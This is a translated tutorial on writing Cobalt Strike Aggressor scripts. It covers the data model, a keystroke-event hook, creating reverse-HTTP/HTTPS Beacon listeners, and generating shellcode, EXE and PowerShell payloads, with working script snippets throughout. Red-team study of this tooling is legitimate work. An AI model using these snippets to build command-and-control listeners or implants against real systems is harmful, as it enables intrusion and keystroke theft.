cobaltstrike plug in development official guide part2

Posted by trammel at 2020-04-01

Translation + Practice

Original address:

0x03 data model

Cobalt strike's team server stores all host, service, credentials and other information.

Cobalt Strike

Data API

The data model of cobalt strike can be queried by using the & Data & query function. This function accesses all the state and information maintained by the cobalt strike client. There is one more function to query and formulate data using & data ﹣ keys. See demo:

&data_query Cobalt Strike Cobalt Strike &data_keys command export { local('$handle $model $row $entry $index'); $handle = openf(">export.txt"); foreach $model (data_keys()) { println($handle, "== $model =="); println($handle, data_query($model)); } closef($handle); println("See export.txt for the data."); }

Cobalt strike provides a variety of functions to facilitate attackers to use the data model more intuitively.

Cobalt Strike

Calling these functions returns an array of each entry in the model, each row for a dictionary containing the key and its key value.

The easiest way to understand this is to debug it directly on the console. The X command is prepared for this. See the figure:


Basic array operation. )

Use on data key to focus on changes in the development model:

on DATA_KEY on keystrokes { println("I have new keystrokes: $1"); }

0x04 monitor

Listeners is the core module of cobalt strike to process the information sent by BOT.

Listeners Cobalt Strike

Listener API

Agscript collects information from listeners connected to the current team server. The advantage of this is that it can easily transfer the session to another team server. If you want to get a list of all listener names, you can use the & listeners function, and only use the & listeners & local function of the local listener, The listener info function resolves the listener name to its configuration information, demo:

agscript &listeners &listeners_local &listener_info command listeners { local('$name $key $value'); foreach $name (listeners()) { println("== $name == "); foreach $key => $value (listener_info($name)) { println("$[20]key : $value"); } } }

Listener creation

Use the & listener? Create function. Demo:

# 新建一个foreign监听器 listener_create("My Metasploit", "windows/foreign_https/reverse_https", "", 443); # 新建一个HTTP Beacon监听器 listener_create("Beacon HTTP", "windows/beacon_http/reverse_http", "", 80, ",");

Listener delete

With the & listener_delete function, it is worth injecting a parameter, that is, the name of the listener.

&listener_delete listener_delete("Beacon HTTP");

(it's embarrassing. I don't know whether it's the official bug or the Chinese version. It runs normally in the code. If you drop it on the console, GG will do. )

Monitor selection

Using & openpayloadhelper, a list of currently available listeners will pop up for selection. After the user selects them, the program will then run the callback function, demo:

item "&Spawn" { openPayloadHelper(lambda({ binput($bids, "spawn $1"); bspawn($bids, $1); }, $bids => $1)); }

Shellcode generation

Use & shellcode to generate shellcode for the specified listener name.

shellcode $data = shellcode("my listener", false, "x86"); $handle = openf(">out.bin"); writeb($handle, $data); closef($handle); artifact("my listener","exe",false,x86);

Compared with shellcode generation, only the second parameter is added, that is, the type of BOT program generated. There are seven types available:

A small demo written by myself:

popup beacon_bottom { item "exe" { $data = artifact("cat", "exe"); $handle = openf(">cat.exe"); writeb($handle, $data); closef($handle); } }

Write only two parameters because the other two parameters are false and x86 by default. It doesn't matter if you don't want to write them.


The function is & PowerShell, usage:

println(powershell("my listener", false,x86));

It is as like as two peas in shellcode. (originally a subset of shellcode, I don't know why the official should write it independently.)


Function & artifact_stageless, demo:

sub ready { local('$handle'); $handle = openf(">out.exe"); writeb($handle, $1); closef($handle); } artifact_stageless("my listener", "exe", "x86", "", &ready);

Compared with Exe / DLL, many parameters generated are agent information, others are the same.